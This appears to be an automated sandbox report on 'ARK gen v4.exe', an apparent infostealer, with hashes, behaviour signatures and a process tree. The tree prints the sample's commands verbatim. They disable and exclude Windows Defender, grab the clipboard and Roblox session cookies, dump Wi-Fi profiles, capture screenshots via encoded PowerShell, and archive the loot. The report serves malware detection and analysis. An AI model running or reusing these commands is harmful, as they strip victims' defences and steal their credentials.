Analysis

  • max time kernel
    26s
  • max time network
    27s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-12-2024 17:45

General

  • Target

    ARK gen v4.exe

  • Size

    5.9MB

  • MD5

    3ffe9096a09d9945254115d93d22fe69

  • SHA1

    ca12c68e82bbd5a656c817eaf46bf17da0a0689a

  • SHA256

    de83827afad4b125b56f60826cd83c4c0f699e6454d4869e74a7fba4874e04f8

  • SHA512

    c54a576ce877215f14150bc0fe69913f99bb2e807d5c21bffddc5a91bfd7e2a76f32a39a07c7df5cbd03f13145b241a60f5b55bec1a1e3a2ea97a914cfc4f617

  • SSDEEP

    98304:mkDe7pzfmt8MMhJMjarCtaCObO/OH9KkqQz4W1kgeDgFM713eMWOL:mhNzfB6yA+KO0WRti7/WOL

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 45 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ARK gen v4.exe
    "C:\Users\Admin\AppData\Local\Temp\ARK gen v4.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4208
    • C:\Users\Admin\AppData\Local\Temp\ARK gen v4.exe
      "C:\Users\Admin\AppData\Local\Temp\ARK gen v4.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2644
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ARK gen v4.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1136
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ARK gen v4.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4916
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2104
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3440
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎  ‌‎.scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5096
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎  ‌‎.scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5032
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:748
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2968
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1520
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5040
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3552
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3344
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:1368
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4364
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2892
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4384
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:3308
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:3620
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:440
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3576
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:4396
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2992
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:4564
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2092
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1424
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n430jfjz\n430jfjz.cmdline"
                5⤵
                  PID:4516
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8944.tmp" "c:\Users\Admin\AppData\Local\Temp\n430jfjz\CSCF35FC916DFC14BC0B615CD8A5548A4A4.TMP"
                    6⤵
                      PID:3240
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3844
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:2580
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2400
                  • C:\Windows\system32\attrib.exe
                    attrib -r C:\Windows\System32\drivers\etc\hosts
                    4⤵
                    • Drops file in Drivers directory
                    • Views/modifies file attributes
                    PID:1136
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:4652
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:5032
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                      3⤵
                        PID:5108
                        • C:\Windows\system32\attrib.exe
                          attrib +r C:\Windows\System32\drivers\etc\hosts
                          4⤵
                          • Drops file in Drivers directory
                          • Views/modifies file attributes
                          PID:2696
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:1884
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:2840
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                            3⤵
                              PID:4840
                              • C:\Windows\system32\tasklist.exe
                                tasklist /FO LIST
                                4⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3960
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:4356
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:1596
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:632
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:3552
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      3⤵
                                        PID:3808
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5068
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        3⤵
                                          PID:2404
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4784
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "getmac"
                                          3⤵
                                            PID:4152
                                            • C:\Windows\system32\getmac.exe
                                              getmac
                                              4⤵
                                                PID:2332
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI42082\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\QY9Ad.zip" *"
                                              3⤵
                                                PID:1176
                                                • C:\Users\Admin\AppData\Local\Temp\_MEI42082\rar.exe
                                                  C:\Users\Admin\AppData\Local\Temp\_MEI42082\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\QY9Ad.zip" *
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:4184
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                3⤵
                                                  PID:4448
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic os get Caption
                                                    4⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3552
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                  3⤵
                                                    PID:5060
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic computersystem get totalphysicalmemory
                                                      4⤵
                                                        PID:3772
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                      3⤵
                                                        PID:4940
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic csproduct get uuid
                                                          4⤵
                                                            PID:640
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                          3⤵
                                                            PID:2792
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:2096
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                            3⤵
                                                              PID:1964
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic path win32_VideoController get name
                                                                4⤵
                                                                • Detects videocard installed
                                                                PID:1776
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                              3⤵
                                                                PID:4144
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:4452

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

